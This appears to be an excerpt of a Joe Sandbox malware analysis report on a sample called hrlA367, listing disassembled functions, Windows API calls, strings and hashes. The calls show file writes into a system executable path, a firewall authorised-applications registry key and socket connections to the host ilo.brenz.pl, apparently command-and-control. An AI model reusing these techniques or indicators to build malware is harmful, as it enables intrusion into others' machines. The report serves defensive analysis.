GetSystemDirectoryA.KERNEL32(C:\Windows\sysWOW64\wbem\wmiprvse.exe,00000104), ref: 7FE33093
CreateFileA.KERNEL32(C:\Windows\sysWOW64\wbem\wmiprvse.exe,40000000,00000000,00000000,00000003,00000000,00000000), ref: 7FE330D4
WriteFile.KERNEL32(00000000,7FE33EDB,00000019,C:\Windows\sysWOW64\wbem\wmiprvse.exe,00000000,00000000), ref: 7FE330F6
CloseHandle.KERNEL32(?,00000003), ref: 7FE330FC
GetProcAddress.KERNEL32(00000000,7FE3311D), ref: 7FE33128
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FE3313B
GetTickCount.KERNEL32 ref: 7FE3316F
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FE3637A,00000000,00000000,00000000,00000000), ref: 7FE33241

Strings

SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE3330F
C:\Windows\sysWOW64\wbem\wmiprvse.exe, xrefs: 7FE33092, 7FE330A2, 7FE330D3, 7FE330EE
"', xrefs: 7FE332BA
ADVAPI32.DLL, xrefs: 7FE3313A
"', xrefs: 7FE33114

Memory Dump Source

Source File: 00000015.00000002.2066853464.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7fe30000_hrlA367.jbxd

Similarity

API ID: FileHandle$AddressCloseCountCreateDirectoryInformationLibraryLoadModuleProcSystemTickVolumeWrite
String ID: "'$"'$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 1729360627-1059917411
Opcode ID: 19b44635278fe99a4415179c49d6eb8c4f8a4d309380675498a1a4a2d9bdcc0e
Instruction ID: 6b64a43cb509898f68348655a96a0e184e2e065f58832200b8bd953c97f5cb1b
Opcode Fuzzy Hash: 19b44635278fe99a4415179c49d6eb8c4f8a4d309380675498a1a4a2d9bdcc0e
Instruction Fuzzy Hash: 2591F271954358BFEB269F20CC0EFEA3B6CDF41311F80011AED5A9A081DAF46F06D6A5

Function 00623EB5 Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 276networklibrarythreadCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00623EA9), ref: 00623EB5

Part of subcall function 00623ECC: GetProcAddress.KERNEL32(00000000,00623EC0), ref: 00623ECD
Part of subcall function 00623ECC: GetModuleFileNameA.KERNEL32(00000000,020a00 . . :#a260b0403 +*,000000C8), ref: 00623EE2
Part of subcall function 00623ECC: wsprintfA.USER32 ref: 00623EF7
Part of subcall function 00623ECC: CreateThread.KERNEL32(00000000,00000000,00623691,00000000,00000000), ref: 00623F40
Part of subcall function 00623ECC: CloseHandle.KERNEL32(?,1C567C50), ref: 00623F49

CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00623FE9
CloseHandle.KERNEL32(?,00000000), ref: 00623FF2
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00623FFF
socket.WS2_32(00000002,00000001,00000000), ref: 00624097
connect.WS2_32(6F6C6902,00623B09,00000010), ref: 006240B1
GetVersionExA.KERNEL32(?,?,00000000), ref: 006240FB
wsprintfA.USER32 ref: 00624179

Strings

C:\USERS\user\APPDATA\LOCAL\SYSTEMRESOURCES\HRLA367.TMP.MUN, xrefs: 006241DA
020a00 . . :#a260b0403 +*, xrefs: 00623EDF, 00623EF4, 00623F0B, 00624195, 006241DB
C:,, xrefs: 00623EF6, 00623F08
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00623F0C

Memory Dump Source

Source File: 00000015.00000002.2066207224.0000000000620000.00000040.10000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_620000_hrlA367.jbxd

Yara matches

Similarity

API ID: Create$CloseHandleThreadwsprintf$AddressEventFileLibraryLoadModuleNameProcVersionconnectsocket
String ID: 020a00 . . :#a260b0403 +*$C:,$C:\USERS\user\APPDATA\LOCAL\SYSTEMRESOURCES\HRLA367.TMP.MUN$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 4150863296-3729073627
Opcode ID: 9f06b138147dde36dface2e64d8b648724a67120387ec8aabe41be75442747ba
Instruction ID: cb47e4cf2665802155ca7f40a2576fd2f8aab60c8582f78801048c38494bda4e
Opcode Fuzzy Hash: 9f06b138147dde36dface2e64d8b648724a67120387ec8aabe41be75442747ba
Instruction Fuzzy Hash: 45A10F71408669BFEB219F249C1EBEA7BAEEF41300F044549E8498E282D7F45F45CBA5

Function 7FE330AB Relevance: 33.5, APIs: 14, Strings: 5, Instructions: 273stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(C:\Windows\sysWOW64\wbem\wmiprvse.exe,7FE3309E), ref: 7FE330AC

Part of subcall function 7FE330BE: lstrcat.KERNEL32(C:\Windows\sysWOW64\wbem\wmiprvse.exe,7FE330B7), ref: 7FE330BF
Part of subcall function 7FE330BE: CreateFileA.KERNEL32(C:\Windows\sysWOW64\wbem\wmiprvse.exe,40000000,00000000,00000000,00000003,00000000,00000000), ref: 7FE330D4
Part of subcall function 7FE330BE: WriteFile.KERNEL32(00000000,7FE33EDB,00000019,C:\Windows\sysWOW64\wbem\wmiprvse.exe,00000000,00000000), ref: 7FE330F6
Part of subcall function 7FE330BE: CloseHandle.KERNEL32(?,00000003), ref: 7FE330FC
Part of subcall function 7FE330BE: GetProcAddress.KERNEL32(00000000,7FE3311D), ref: 7FE33128
Part of subcall function 7FE330BE: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FE3313B
Part of subcall function 7FE330BE: GetTickCount.KERNEL32 ref: 7FE3316F

Strings

SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE3330F
C:\Windows\sysWOW64\wbem\wmiprvse.exe, xrefs: 7FE330AB, 7FE330D3, 7FE330EE
"', xrefs: 7FE332BA
ADVAPI32.DLL, xrefs: 7FE3313A
"', xrefs: 7FE33114

Memory Dump Source

Source File: 00000015.00000002.2066853464.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7fe30000_hrlA367.jbxd

Similarity

API ID: Filelstrcat$AddressCloseCountCreateHandleLibraryLoadProcTickWrite
String ID: "'$"'$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 4135777234-1059917411
Opcode ID: 6958d413b6abf8e1b28038c6610194ed2bae6efbd87a574ee0b1bcde9ea0452d
Instruction ID: f56c8c8788c1527792fd5fee25e748029393f3a60fbf17811963ed314d73609c
Opcode Fuzzy Hash: 6958d413b6abf8e1b28038c6610194ed2bae6efbd87a574ee0b1bcde9ea0452d
Instruction Fuzzy Hash: 9091F171944718BFEB269F208C0EFEA3B6CDF41311F80011AED5A9E081DAF4AF05D6A5

Function 00623ECC Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 265threadlibraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,00623EC0), ref: 00623ECD
GetModuleFileNameA.KERNEL32(00000000,020a00 . . :#a260b0403 +*,000000C8), ref: 00623EE2
wsprintfA.USER32 ref: 00623EF7
CreateThread.KERNEL32(00000000,00000000,00623691,00000000,00000000), ref: 00623F40
CloseHandle.KERNEL32(?,1C567C50), ref: 00623F49
CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00623FE9
CloseHandle.KERNEL32(?,00000000), ref: 00623FF2
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00623FFF

Part of subcall function 00623405: NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 0062344A
Part of subcall function 00623405: NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 00623469
Part of subcall function 00623405: MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 00623493
Part of subcall function 00623405: CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 006234A0
Part of subcall function 00623405: UnmapViewOfFile.KERNEL32(?), ref: 006234B8

Strings

C:\USERS\user\APPDATA\LOCAL\SYSTEMRESOURCES\HRLA367.TMP.MUN, xrefs: 006241DA
020a00 . . :#a260b0403 +*, xrefs: 00623EDF, 00623EF4, 00623F0B, 00624195, 006241DB
C:,, xrefs: 00623EF6, 00623F08
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00623F0C

Memory Dump Source

Source File: 00000015.00000002.2066207224.0000000000620000.00000040.10000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_620000_hrlA367.jbxd

Yara matches

Similarity

API ID: CloseCreateFileHandle$ThreadView$AddressEventInformationModuleNameOpenProcQuerySectionSystemUnmapwsprintf
String ID: 020a00 . . :#a260b0403 +*$C:,$C:\USERS\user\APPDATA\LOCAL\SYSTEMRESOURCES\HRLA367.TMP.MUN$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 541178049-3729073627
Opcode ID: 3176691832235144c822bda6bdece0b9c65d83022bcced3ec1f9b4779e38ef98
Instruction ID: 08354d911600ba317626d8030ffd829120ca11e90e0c8ff691eb4b4f1537aea1
Opcode Fuzzy Hash: 3176691832235144c822bda6bdece0b9c65d83022bcced3ec1f9b4779e38ef98
Instruction Fuzzy Hash: FEA10F71408669BFEB219F249C1EBEA7BAEEF41300F044648F8499E182D7F45F45CBA5

Function 7FE330BE Relevance: 33.5, APIs: 14, Strings: 5, Instructions: 264filelibrarystringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(C:\Windows\sysWOW64\wbem\wmiprvse.exe,7FE330B7), ref: 7FE330BF
CreateFileA.KERNEL32(C:\Windows\sysWOW64\wbem\wmiprvse.exe,40000000,00000000,00000000,00000003,00000000,00000000), ref: 7FE330D4
WriteFile.KERNEL32(00000000,7FE33EDB,00000019,C:\Windows\sysWOW64\wbem\wmiprvse.exe,00000000,00000000), ref: 7FE330F6
CloseHandle.KERNEL32(?,00000003), ref: 7FE330FC
GetProcAddress.KERNEL32(00000000,7FE3311D), ref: 7FE33128
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FE3313B
GetTickCount.KERNEL32 ref: 7FE3316F
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FE3637A,00000000,00000000,00000000,00000000), ref: 7FE33241

Strings

SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE3330F
C:\Windows\sysWOW64\wbem\wmiprvse.exe, xrefs: 7FE330BE, 7FE330D3, 7FE330EE
"', xrefs: 7FE332BA
ADVAPI32.DLL, xrefs: 7FE3313A
"', xrefs: 7FE33114

Memory Dump Source

Source File: 00000015.00000002.2066853464.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7fe30000_hrlA367.jbxd

Similarity

API ID: File$AddressCloseCountCreateHandleInformationLibraryLoadProcTickVolumeWritelstrcat
String ID: "'$"'$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 3969241177-1059917411
Opcode ID: e99baabed080411f04b0d806c93d617434853b94cdc5a730a8b5d052636699dc
Instruction ID: 09541bb4dc3411c55ab005cb888b55fbb50cd13fbca17e3ae23e295a94b6b269
Opcode Fuzzy Hash: e99baabed080411f04b0d806c93d617434853b94cdc5a730a8b5d052636699dc
Instruction Fuzzy Hash: 7281BE71914718BFEB269F208C0EFEA3B6DDF41311F80011AED5A9E081EAF46F05D6A5

Function 7FE32FCB Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 309filelibraryloaderCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(C:\Windows\sysWOW64\wbem\wmiprvse.exe,40000000,00000000,00000000,00000003,00000000,00000000), ref: 7FE330D4
WriteFile.KERNEL32(00000000,7FE33EDB,00000019,C:\Windows\sysWOW64\wbem\wmiprvse.exe,00000000,00000000), ref: 7FE330F6
CloseHandle.KERNEL32(?,00000003), ref: 7FE330FC
GetProcAddress.KERNEL32(00000000,7FE3311D), ref: 7FE33128
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FE3313B
GetTickCount.KERNEL32 ref: 7FE3316F

Strings

SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE3330F
C:\Windows\sysWOW64\wbem\wmiprvse.exe, xrefs: 7FE330D3, 7FE330EE
"', xrefs: 7FE332BA
ADVAPI32.DLL, xrefs: 7FE3313A
"', xrefs: 7FE33114

Memory Dump Source

Source File: 00000015.00000002.2066853464.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7fe30000_hrlA367.jbxd

Similarity

API ID: File$AddressCloseCountCreateHandleLibraryLoadProcTickWrite
String ID: "'$"'$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 896256579-1059917411
Opcode ID: 725bb423a29dcd62c43598a103823de9de260c4f48a9b794d588fa8ccf6d82a8
Instruction ID: 9c4dac55b76228d7ff9437610bb880f50dd66be18c7f3b043a5811b11c928d4e
Opcode Fuzzy Hash: 725bb423a29dcd62c43598a103823de9de260c4f48a9b794d588fa8ccf6d82a8
Instruction Fuzzy Hash: E6A1F571954718BFEB269F208C0EFEA37ADDF41311F80011AED5A9E081DAF46F05D6A5

Function 7FE33112 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 233libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(7FE33107), ref: 7FE33112

Part of subcall function 7FE33127: GetProcAddress.KERNEL32(00000000,7FE3311D), ref: 7FE33128
Part of subcall function 7FE33127: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FE3313B
Part of subcall function 7FE33127: GetTickCount.KERNEL32 ref: 7FE3316F
Part of subcall function 7FE33127: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FE3637A,00000000,00000000,00000000,00000000), ref: 7FE33241
Part of subcall function 7FE33127: Sleep.KERNEL32(00000064,0000001E), ref: 7FE33288
Part of subcall function 7FE33127: DeleteFileA.KERNEL32(7FE36020), ref: 7FE3328F

Strings

SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE3330F
"', xrefs: 7FE332BA
ADVAPI32.DLL, xrefs: 7FE3313A

Memory Dump Source

Source File: 00000015.00000002.2066853464.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7fe30000_hrlA367.jbxd

Similarity

API ID: LibraryLoad$AddressCountDeleteFileInformationProcSleepTickVolume
String ID: "'$ADVAPI32.DLL$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 3926103657-2346592412
Opcode ID: b10989e1a19bd5d43d225fa2a3c42957d908225e734b95b6c14a3a6c700d835d
Instruction ID: d292d2856ce22b528264e3fb5c31764abc2e853f458007e39b67dc21da23dd02
Opcode Fuzzy Hash: b10989e1a19bd5d43d225fa2a3c42957d908225e734b95b6c14a3a6c700d835d
Instruction Fuzzy Hash: BD71D271915718BFEB269F20CC0EEEA37ADDF41311F80011AED5A9E081DAF4AF05D6A5

Function 7FE33127 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 240sleeplibraryfileCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,7FE3311D), ref: 7FE33128
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FE3313B
GetTickCount.KERNEL32 ref: 7FE3316F
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FE3637A,00000000,00000000,00000000,00000000), ref: 7FE33241
Sleep.KERNEL32(00000064,0000001E), ref: 7FE33288
DeleteFileA.KERNEL32(7FE36020), ref: 7FE3328F
CreateThread.KERNEL32(00000000,00000000,7FE32C7D,00000000,00000000), ref: 7FE33343
CloseHandle.KERNEL32(?,0C1A4F68), ref: 7FE3334C
WSAStartup.WS2_32(00000101), ref: 7FE333D1
Sleep.KERNEL32(00001388,00000000,00000000), ref: 7FE333F3

Strings

SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE3330F
"', xrefs: 7FE332BA
ADVAPI32.DLL, xrefs: 7FE3313A

Memory Dump Source

Source File: 00000015.00000002.2066853464.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7fe30000_hrlA367.jbxd

Similarity

API ID: Sleep$AddressCloseCountCreateDeleteFileHandleInformationLibraryLoadProcStartupThreadTickVolume
String ID: "'$ADVAPI32.DLL$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 2219344514-2346592412
Opcode ID: 5b9ba073255788373456750f45873bb949f55a25902f1e72925c0e661daa5f85
Instruction ID: 9bf7545e8cb9496520d09b0b1350cb01679fb2f5a0313100841ffea94c71ba5e
Opcode Fuzzy Hash: 5b9ba073255788373456750f45873bb949f55a25902f1e72925c0e661daa5f85
Instruction Fuzzy Hash: 2871A271915718BFEB269F20DC0EBEA37ACEF41311F80011AED5A9E081DAF46F05D6A5

Function 00623F60 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 215librarystringthreadCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00623F54), ref: 00623F60

Part of subcall function 00623F8F: LoadLibraryA.KERNEL32(00623F83), ref: 00623F8F
Part of subcall function 00623F8F: WSAStartup.WS2_32(00000101), ref: 00623FCE
Part of subcall function 00623F8F: CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00623FE9
Part of subcall function 00623F8F: CloseHandle.KERNEL32(?,00000000), ref: 00623FF2
Part of subcall function 00623F8F: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00623FFF
Part of subcall function 00623F8F: socket.WS2_32(00000002,00000001,00000000), ref: 00624097
Part of subcall function 00623F8F: connect.WS2_32(6F6C6902,00623B09,00000010), ref: 006240B1
Part of subcall function 00623F8F: GetVersionExA.KERNEL32(?,?,00000000), ref: 006240FB

lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 00624057
gethostbyname.WS2_32(ilo.brenz.pl), ref: 00624066
wsprintfA.USER32 ref: 00624179
CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 006241B4
CloseHandle.KERNEL32(?,00000000,6F6C6902,00626AA2,00000000,00000000), ref: 006241BD
GetTickCount.KERNEL32 ref: 006241F6

Strings

C:\USERS\user\APPDATA\LOCAL\SYSTEMRESOURCES\HRLA367.TMP.MUN, xrefs: 006241DA
020a00 . . :#a260b0403 +*, xrefs: 00624195, 006241DB

Memory Dump Source

Source File: 00000015.00000002.2066207224.0000000000620000.00000040.10000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_620000_hrlA367.jbxd

Yara matches

Similarity

API ID: Create$CloseHandleLibraryLoadThread$CountEventStartupTickVersionconnectgethostbynamelstrlensocketwsprintf
String ID: 020a00 . . :#a260b0403 +*$C:\USERS\user\APPDATA\LOCAL\SYSTEMRESOURCES\HRLA367.TMP.MUN
API String ID: 2996464229-2044341515
Opcode ID: 98c4dc3622c81e610166b3295d4bccfe550f8d2832964dac318e74891848542e
Instruction ID: d4868fcc2121b9a2e9753c400200a8588558dc7f0203b6bbf05a4192d1cc3bc8
Opcode Fuzzy Hash: 98c4dc3622c81e610166b3295d4bccfe550f8d2832964dac318e74891848542e
Instruction Fuzzy Hash: 4A810F715086A9BFEB219F349C19BEA7BAEEF41300F044558E8498E1C2C7F45F45CB66

Function 7FE33392 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 177networksleeplibraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(7FE33386), ref: 7FE33392
WSAStartup.WS2_32(00000101), ref: 7FE333D1
Sleep.KERNEL32(00001388,00000000,00000000), ref: 7FE333F3
gethostbyname.WS2_32(ilo.brenz.pl), ref: 7FE33412
lstrlen.KERNEL32(ilo.brenz.pl), ref: 7FE3341D
socket.WS2_32(00000002,00000001,00000000), ref: 7FE33453
connect.WS2_32(?,7FE32EB6,00000010), ref: 7FE3346D
GetVersionExA.KERNEL32(?,?,7FE32EB6,00000010), ref: 7FE334B7

Strings

C:\Windows\sysWOW64\wbem\wmiprvse.exe, xrefs: 7FE33570, 7FE33590
ilo.brenz.pl, xrefs: 7FE33411, 7FE3341C

Memory Dump Source

Source File: 00000015.00000002.2066853464.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7fe30000_hrlA367.jbxd

Similarity

API ID: LibraryLoadSleepStartupVersionconnectgethostbynamelstrlensocket
String ID: C:\Windows\sysWOW64\wbem\wmiprvse.exe$ilo.brenz.pl
API String ID: 801863514-1010093679
Opcode ID: 174516e84d9c669cdc790a5bd5a266766651d9cd51a165662f06c8ce5e18c4ab
Instruction ID: ec9582b3104ee8db84d86a8e063e61350cf898793cca2a983ffbcde4064a8b90
Opcode Fuzzy Hash: 174516e84d9c669cdc790a5bd5a266766651d9cd51a165662f06c8ce5e18c4ab
Instruction Fuzzy Hash: 0361D132A04359BFEB22CF24C819FDE3BBDAF41715F440514E86A9E091D6F4AB04DBA5

Function 00402430 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 71libraryfileloaderCOMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(?,?,?), ref: 0040244F
LoadLibraryA.KERNEL32(kernel32.dll,SizeofResource), ref: 00402461
GetProcAddress.KERNEL32(00000000), ref: 00402468
LoadResource.KERNEL32(?,00000000), ref: 0040247A
LockResource.KERNEL32(00000000), ref: 00402489
CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 004024BD
WriteFile.KERNEL32 ref: 004024DC
CloseHandle.KERNEL32(00000000), ref: 004024E3

Strings

SizeofResource, xrefs: 00402455
hra%u.dll, xrefs: 0040249A
<6@, xrefs: 004024A0
kernel32.dll, xrefs: 0040245A

Memory Dump Source

Source File: 00000015.00000002.2064830909.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.2064795062.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064865379.0000000000406000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064896028.0000000000408000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064927902.000000000040A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064959905.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064992453.0000000000414000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065024303.000000000041A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065055495.000000000041B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065086646.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065117221.0000000000422000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065150592.0000000000429000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065181608.000000000042E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065213605.0000000000430000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065247297.0000000000436000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065278608.0000000000437000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065314228.000000000043C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065345921.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065376800.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065412995.0000000000444000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065444222.0000000000445000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065477000.000000000044A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065510299.000000000044C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065543439.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065574043.0000000000453000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065609286.0000000000458000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065641477.000000000045A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065672358.000000000045B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065703455.0000000000460000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065733984.0000000000461000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065770490.0000000000466000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065800883.0000000000468000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065830355.0000000000469000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065861085.000000000046E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065891278.000000000046F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065923953.0000000000474000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065955831.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065987198.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066018174.000000000047C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066052063.000000000047D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066082716.0000000000482000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_hrlA367.jbxd

Yara matches

Similarity

API ID: Resource$FileLoad$AddressCloseCreateFindHandleLibraryLockProcWrite
String ID: <6@$SizeofResource$hra%u.dll$kernel32.dll
API String ID: 2921964263-2374908272
Opcode ID: 8a57ef22dd47a814e705dbe9eb76e98e586b3eddb95431373c2ff637a7035f3e
Instruction ID: 298c1543b4fc4cf1b22406217ce591795a308af8d218835589389581325cd5cf
Opcode Fuzzy Hash: 8a57ef22dd47a814e705dbe9eb76e98e586b3eddb95431373c2ff637a7035f3e
Instruction Fuzzy Hash: 9211E9321803007BE2309B659E4DFAB7BACDF85B10F054439FA42F21D0DBB9981586B9

Function 00403920 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 187librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 004039C6
GetLastError.KERNEL32 ref: 004039D2
RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 00403A05
InterlockedExchange.KERNEL32(?,00000000), ref: 00403A17
LocalAlloc.KERNEL32(00000040,00000008), ref: 00403A2B
FreeLibrary.KERNEL32(00000000), ref: 00403A48
GetProcAddress.KERNEL32(?,?), ref: 00403AA9
GetLastError.KERNEL32 ref: 00403AB5
RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 00403AE7

Strings

$, xrefs: 0040393C

Memory Dump Source

Source File: 00000015.00000002.2064830909.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.2064795062.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064865379.0000000000406000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064896028.0000000000408000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064927902.000000000040A000.00000080.00000001.01000000.00000007.sdmpDownload File
